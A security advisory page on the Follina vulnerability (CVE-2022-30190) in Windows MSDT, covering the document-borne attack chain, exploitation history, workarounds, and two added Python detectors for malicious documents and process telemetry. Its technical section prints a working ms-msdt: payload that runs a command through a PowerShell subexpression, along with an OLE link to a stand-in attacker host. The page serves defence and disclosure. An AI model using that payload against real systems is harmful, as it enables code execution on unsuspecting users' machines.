CVE-2022-30190

Microsoft Windows 'Follina' — MSDT URL Handler Invoked by Office Documents Allows Code Execution Without Macros
⚠️ CVSS 3.1  7.8 / 10 — HIGH 🔴 CISA Known Exploited Vulnerability

Overview

Actively exploited. CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog on June 14, 2022 with a remediation deadline of July 5, 2022; federal agencies are required to apply mitigations under BOD 22-01.

CVE-2022-30190, nicknamed "Follina," is a code execution vulnerability in the Windows Microsoft Support Diagnostic Tool (MSDT). When Microsoft Word opens a document containing an external OLE object link to an attacker-controlled server, Word fetches an HTML file that navigates to an ms-msdt: URL. Windows hands that URL to msdt.exe with attacker-controlled switches, and the PCWDiagnostic troubleshooter evaluates a PowerShell subexpression embedded in them, so an arbitrary command runs as the user: no macros, no administrative privileges, and (for the .rtf variant) no document ever opened.

Follina was exploited as a zero-day for roughly two months (from at least April 12, 2022 until the June 14 fix), with confirmed campaigns by the China-aligned group TA413 and by Russian state actors. Its significance lies in sidestepping the macro-centric phishing defenses that organizations had spent years building: the attack works with macros entirely disabled.

What Is Microsoft Support Diagnostic Tool (MSDT)?

MSDT is a built-in Windows utility that runs troubleshooting packs and can collect diagnostic information for Microsoft support. It registers the ms-msdt: URI scheme, so any application that hands Windows such a URL (a browser, or Office rendering fetched HTML) can launch msdt.exe with the switches embedded in the URL. Troubleshooting packs are PowerShell scripts, and parameters passed on the URL reach them; that is the primitive Follina turns into code execution once the parameters are attacker-controlled.

Affected Versions

Product Vulnerable Notes
Microsoft Office 2013 Yes Delivery vehicle; exposed on any Windows build without the June 14, 2022 update
Microsoft Office 2016 Yes Delivery vehicle; exposed on any Windows build without the June 14, 2022 update
Microsoft Office 2019 Yes Delivery vehicle; exposed on any Windows build without the June 14, 2022 update
Microsoft Office LTSC 2021 Yes Delivery vehicle; exposed on any Windows build without the June 14, 2022 update
Microsoft 365 Apps Yes Delivery vehicle; exposed on any Windows build without the June 14, 2022 update
Windows Yes Where the flaw lives: Windows 7 through 11 and Server 2008 through 2022, any build with the ms-msdt: handler registered and without the June 14, 2022 update

Fixed in the June 14, 2022 Patch Tuesday Windows updates. The vulnerability is in Windows MSDT itself; Office is only the delivery vehicle, and the Office update level does not change exposure.

Technical Details

Root Cause: MSDT URL Handler Invoked via an External OLE Object Link

Word documents can embed linked OLE objects whose content is fetched from a URL and refreshed when the document opens. The attack chain:

  1. A malicious .docx declares an OLE object link in word/document.xml (ProgID htmlfile, UpdateMode="Always") whose relationship in word/_rels/document.xml.rels points at an attacker-controlled URL:

    <Relationship Type=".../relationships/oleObject" Target="http://attacker.com/evil.html" TargetMode="External"/>
    
  2. Word refreshes the link with a plain HTTP GET to the attacker's server (the request comes from WINWORD.EXE itself). The server returns an HTML file.

  3. The HTML file navigates to an ms-msdt: URL, which Windows resolves to the MSDT protocol handler:

    <script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(cmd /c 'calc.exe')/.exe\""; </script>
    
  4. Windows launches msdt.exe with the attacker-supplied switches. The PCWDiagnostic (Program Compatibility) troubleshooter passes the IT_BrowseForFile value into its PowerShell script, where the $( ... ) subexpression is evaluated and the embedded command runs; the surrounding ../ components and .exe suffix exist only to get the value past the script's file-path checks.

The command runs as the user who opened the document, with no macro execution and no macro warning dialog. For the .docx variant Protected View still applies when the file carries the Mark of the Web: the link is not refreshed until the user clicks "Enable Editing". The .rtf variant needs neither an open nor an Enable Editing click, because the Explorer Preview Pane renders it outside Protected View.

Why Macros-Off Doesn't Prevent This

Traditional Office phishing requires the user to enable macros, which Microsoft and IT security teams have worked for years to prevent via Group Policy, user training and default-block settings. Follina uses a different code path, Office's refresh of linked OLE objects, which macro settings do not govern. An organization that has eliminated macro-enabled document risk is still fully exposed to Follina via ordinary .docx and .rtf files.

RTF Variant: No Click Required

The .rtf variant is particularly dangerous: with the Windows Explorer Preview Pane enabled, merely selecting (single-clicking) the malicious .rtf renders it through Word's preview handler, which refreshes the OLE link, fetches the HTML and fires the ms-msdt: URL. The user never opens the file and Protected View is never involved.
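The delivery chain in steps 1 to 4 and the RTF variant are all visible in the file itself, so the natural first control is a scanner over inbound attachments. The following is an added example, not code from the original page or from any of the researchers it cites: it unpacks a .docx and flags external oleObject/attachedTemplate relationships (ignoring ordinary hyperlinks), hex-decodes RTF \objdata streams to recover link targets that a plain grep would miss, and parses a fetched HTML page's ms-msdt: URL into the switches msdt.exe would receive, flagging the PowerShell subexpression. All samples are constructed in memory, and attacker.example is a placeholder host, not a real indicator.

```python
"""Scan .docx, .rtf and fetched HTML for the Follina (CVE-2022-30190) delivery chain.

Demo samples are built in memory below; no real documents are read.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that make Word fetch and render remote content on open.
FETCHING_TYPES = {"oleObject", "attachedTemplate"}
REMOTE_TARGET = re.compile(r"^(https?://|\\\\)", re.I)  # HTTP(S) or UNC


def scan_docx(data: bytes) -> list:
    """Return (rels file, relationship type, target) for every external OLE/template link."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                # Hyperlinks are External too; only the fetching types matter here.
                if (rel.get("TargetMode") == "External" and rtype in FETCHING_TYPES
                        and REMOTE_TARGET.match(target)):
                    findings.append((name, rtype, target))
    return findings


def parse_msdt(url: str) -> dict:
    """Split an ms-msdt: URL into the switches msdt.exe receives and flag injection."""
    body = url.split(":", 1)[1]
    switches = {}
    for m in re.finditer(r'/(\w+)\s+(?:"([^"]*)"|(\S+))', body):
        switches[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    # /param is "KEY=value KEY=value ..."; a value may itself contain spaces.
    params = dict(re.findall(r"(\w+)=(.*?)(?=\s+\w+=|$)", switches.get("param", "")))
    return {
        "id": switches.get("id"),
        "params": params,
        # A PowerShell subexpression inside IT_BrowseForFile is the Follina signature.
        "injected": "$(" in params.get("IT_BrowseForFile", ""),
    }


def scan_html(text: str) -> list:
    """Find ms-msdt: URLs inside JavaScript string literals and parse each one."""
    found = []
    for quote, literal in re.findall(r'''(["'])(ms-msdt:(?:\\.|(?!\1)[^\\])*)\1''', text):
        found.append(parse_msdt(literal.replace("\\" + quote, quote)))  # undo JS escaping
    return found


def scan_rtf(data: bytes) -> list:
    """Hex-decode {\\*\\objdata ...} streams and report remote URLs in auto-updating OLE links."""
    text = data.decode("latin-1")
    auto_update = "\\objautlink" in text and "\\objupdate" in text
    findings = []
    for m in re.finditer(r"\{\\\*\\objdata\s*([0-9A-Fa-f\s]+)\}", text):
        hexdata = re.sub(r"\s+", "", m.group(1))
        if len(hexdata) % 2:
            continue
        # The target may be stored as UTF-16LE; dropping NULs catches both encodings.
        flat = bytes.fromhex(hexdata).replace(b"\x00", b"").decode("latin-1")
        for url in re.findall(r"https?://[^\s\x00-\x1f\"'<>{}]+", flat):
            findings.append((url, auto_update))
    return findings


def _docx_with_rels(rels_body: str) -> bytes:
    """Assemble a minimal OOXML container around the given document.xml.rels body."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml",
                     "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        pkg.writestr("word/document.xml",
                     "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        pkg.writestr("word/_rels/document.xml.rels",
                     f'<Relationships xmlns="{PKG_NS}">{rels_body}</Relationships>')
    return buf.getvalue()


# Constructed samples (attacker.example is a placeholder, not a real indicator).
FOLLINA_DOCX = _docx_with_rels(
    f'<Relationship Id="rId1" Type="{REL_BASE}oleObject" '
    'Target="http://attacker.example/payload.html" TargetMode="External"/>')
BENIGN_DOCX = _docx_with_rels(
    f'<Relationship Id="rId1" Type="{REL_BASE}hyperlink" '
    'Target="https://example.com/" TargetMode="External"/>')
FOLLINA_HTML = '''<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(cmd /c 'calc.exe')/.exe\\"";
</script></body></html>'''
_ole_stream = (b"\x01\x05\x00\x00\x02\x00\x00\x00htmlfile\x00"
               + "http://attacker.example/payload.html".encode("utf-16-le"))
FOLLINA_RTF = ("{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objclass htmlfile}{\\*\\objdata "
               + _ole_stream.hex() + "}}}").encode()

if __name__ == "__main__":
    print(scan_docx(FOLLINA_DOCX), scan_docx(BENIGN_DOCX))
    print(scan_html(FOLLINA_HTML))
    print(scan_rtf(FOLLINA_RTF))
```

The hyperlink sample is there on purpose: most documents contain External relationships, so a scanner that flags TargetMode="External" alone will drown in false positives. The relationship type, not the mode, is what distinguishes "Word will fetch and render this" from "the user might click this".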

Attack Characteristics

Attribute Detail
Attack Vector Local (CVSS); practical delivery is a document sent by email or downloaded from the web
User Interaction Required: the user opens the document and leaves Protected View, or selects an .rtf with the Preview Pane enabled
Macros Required No; works with macros completely disabled
Protected View .docx: blocks the link refresh until the user clicks Enable Editing (when the file has the Mark of the Web); .rtf via Preview Pane: not involved at all
Execution Context Runs as the current user; unprivileged, but a full foothold for credential theft, persistence and lateral movement

Discovery

The technique was first seen in the wild in a malicious document dated April 12, 2022, a Russian-language lure aimed at users in Belarus/Russia that was later attributed to Russian state actors. nao_sec, a Japanese security research group, found a suspicious Word document (05-2022-0438.doc) on May 27, 2022 and tweeted about it. Kevin Beaumont, a security researcher who had previously worked at Microsoft, analyzed the technique, recognized its significance, published a detailed breakdown and coined the name "Follina": the 0438 in the sample's filename is the telephone area code of Follina, Italy. Microsoft acknowledged the zero-day on May 30, 2022 and published a registry workaround while working on a fix.

Exploitation Context

Follina was exploited by multiple threat actors during its zero-day window (April–June 2022):

  • TA413 (China-aligned APT): targeted Tibetan organizations with Follina-embedded .docx lures
  • Russian GRU actors (Sandworm and APT28 are distinct units; both were reported using the technique): earliest known exploitation (April 2022) against Belarus/Russia-adjacent targets
  • Qakbot operators: delivered Qakbot via Follina as an initial access technique
  • Ransomware affiliates: incorporated Follina into phishing campaigns for initial access; CISA's KEV entry records known ransomware campaign use
  • State-sponsored campaigns: multiple government advisories noted nation-state use

Remediation

CISA BOD 22-01 Deadline: July 5, 2022. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Immediate Workaround (Pre-Patch)

Disable the MSDT URL handler by deleting its registry key. Export it first so it can be restored; both commands need an elevated command prompt:

reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdt-backup.reg
reg delete HKEY_CLASSES_ROOT\ms-msdt /f

To restore after patching: reg import ms-msdt-backup.reg. (Recreating only the default value of the key is not enough: the handler also needs its URL Protocol value and shell\open\command subkey, which the export preserves.) The June 14, 2022 update does not require the key to be restored; leaving the handler removed is a defensible choice on hosts with no troubleshooter use case.

Recommended Actions

  1. Apply the June 14, 2022 Patch Tuesday Windows update on every affected host; the fix is in Windows, not Office. Verify the installed build via winver and Windows Update history.

  2. Apply the registry workaround above immediately if patching is delayed.

  3. Disable the Preview Pane in Windows Explorer to remove the no-open .rtf path: View → Show/hide → Preview pane (off). Group Policy: User Configuration\Administrative Templates\Windows Components\File Explorer\Explorer Frame Pane\Turn off Preview Pane.

  4. Break the delivery chain at the network layer: proxy/firewall rules that stop Office processes (WINWORD.EXE and the preview handler host) from fetching content from untrusted external URLs prevent the OLE link from ever reaching the attacker's HTML.

  5. Disable the troubleshooting wizards if your organization has no support use case, as Microsoft's own guidance recommends: Computer Configuration\Administrative Templates\System\Troubleshooting and Diagnostics\Scripted Diagnostics\Troubleshooting: Allow users to access and run Troubleshooting Wizards, set to Disabled (registry equivalent: HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics, EnableDiagnostics DWORD 0).

  6. Train users: Follina is delivered via documents. Standard phishing awareness (treat unexpected documents from external senders with suspicion) remains the first line of defense.
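Hosts that sat unpatched during the zero-day window, or on which the workaround was applied late, should be hunted for signs the chain ran. The following is an added example and not code from the original page or from Microsoft: three detection rules over process-creation telemetry, run against constructed sample events (tab-separated time, parent image, image, command line; the field mapping to your Sysmon Event ID 1 or EDR export is an assumption you will need to adapt). The rules key on what step 4 of the attack chain makes visible: msdt.exe spawned by an Office binary, the ms-msdt: URL arriving on the command line with its PowerShell subexpression intact, and sdiagnhost.exe (the host that runs the troubleshooter's PowerShell) spawning a child process.

```python
"""Hunt for Follina-style MSDT abuse in process-creation telemetry.

SAMPLE_LOG is constructed for this example. Each line is tab-separated:
timestamp, parent image, image, command line.
"""
import ntpath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# sdiagnhost.exe normally runs troubleshooter PowerShell in-process, so child
# processes are rare. Baseline this allow-list before alerting on it (assumption).
SDIAGNHOST_ALLOWED = {"conhost.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on non-Windows hosts too)."""
    return ntpath.basename(path).lower()


def classify(parent: str, image: str, cmdline: str) -> list:
    """Return the rule names a single process-creation event trips (empty if clean)."""
    hits = []
    img, par = _base(image), _base(parent)
    # Rule 1: the .docx chain leaves Office as the direct parent of msdt.exe.
    if img == "msdt.exe" and par in OFFICE_PARENTS:
        hits.append("msdt-spawned-by-office")
    # Rule 2: the URL reaches msdt.exe verbatim, so the $( ... ) subexpression is
    # visible in the command line regardless of which process launched it.
    if "ms-msdt:" in cmdline.lower() and "$(" in cmdline:
        hits.append("msdt-url-subexpression")
    # Rule 3: the injected command is executed from the troubleshooter host.
    if par == "sdiagnhost.exe" and img not in SDIAGNHOST_ALLOWED:
        hits.append("sdiagnhost-child-process")
    return hits


def detect(log: str) -> list:
    """Run classify() over every line and return (timestamp, rule) pairs."""
    alerts = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("\t", 3)
        for rule in classify(parent, image, cmdline):
            alerts.append((ts, rule))
    return alerts


SAMPLE_LOG = (
    # Event 1: Word launches msdt.exe with the Follina URL (trips rules 1 and 2).
    "2022-06-02T09:14:03Z\tC:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "\tC:\\Windows\\System32\\msdt.exe"
    "\t\"C:\\Windows\\system32\\msdt.exe\" ms-msdt:/id PCWDiagnostic /skip force /param "
    "\"IT_RebrowseForFile=? IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(cmd /c 'calc.exe')/.exe\"\n"
    # Event 2: msdt.exe hands the troubleshooter to sdiagnhost.exe (no rule by itself).
    "2022-06-02T09:14:04Z\tC:\\Windows\\System32\\msdt.exe\tC:\\Windows\\System32\\sdiagnhost.exe"
    "\tC:\\Windows\\System32\\sdiagnhost.exe -Embedding\n"
    # Event 3: the injected command runs (trips rule 3).
    "2022-06-02T09:14:05Z\tC:\\Windows\\System32\\sdiagnhost.exe\tC:\\Windows\\System32\\cmd.exe"
    "\tcmd /c calc.exe\n"
    # Event 4: a user-launched troubleshooter from Control Panel; must not alert.
    "2022-06-02T10:02:11Z\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\msdt.exe"
    "\tC:\\Windows\\System32\\msdt.exe /id NetworkDiagnosticsWeb\n"
)

if __name__ == "__main__":
    for ts, rule in detect(SAMPLE_LOG):
        print(ts, rule)
```

Rule 1 alone misses the .rtf Preview Pane path, where Word is not the parent; rule 2 is parent-agnostic, which is why it is worth keeping even though it is the easiest for an attacker to vary (the original sample encoded its payload in Base64 inside the subexpression, so match on the subexpression marker rather than on the command it wraps).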

Key Details

Property Value
CVE ID CVE-2022-30190
Vendor / Product Microsoft Windows
NVD Published 2022-06-01
NVD Last Modified 2025-10-30
CVSS 3.1 Score 7.8
CVSS 3.1 Vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Severity HIGH
CWE CWE-610 (Externally Controlled Reference to a Resource in Another Sphere)
CISA KEV Added 2022-06-14
CISA KEV Deadline 2022-07-05
Known Ransomware Use ⚠️ Yes

CVSS 3.1 Breakdown

Metric Value
Attack Vector Local
Attack Complexity Low
Privileges Required None
User Interaction Required
Scope Unchanged
Confidentiality High
Integrity High
Availability High

Required Action

CISA BOD 22-01 Deadline: 2022-07-05. Apply updates per vendor instructions.

Timeline

Date Event
2022-04-12 Earliest known in-the-wild sample: a Russian-language lure document aimed at users in Belarus/Russia, later attributed to Russian state actors
2022-05-27 nao_sec finds a suspicious Word document (05-2022-0438.doc) using the ms-msdt: technique and tweets about it
2022-05-29 Kevin Beaumont analyzes the technique, names it 'Follina' (0438 in the filename is the telephone area code of Follina, Italy) and publishes a detailed writeup
2022-05-30 Microsoft assigns CVE-2022-30190, acknowledges the zero-day and publishes the workaround (disable the ms-msdt: URL handler)
2022-06-01 NVD publishes CVE-2022-30190; multiple threat actor campaigns detected in the wild
2022-06-14 Microsoft releases the fix (June 2022 Patch Tuesday); CISA adds the CVE to KEV
2022-07-05 CISA BOD 22-01 remediation deadline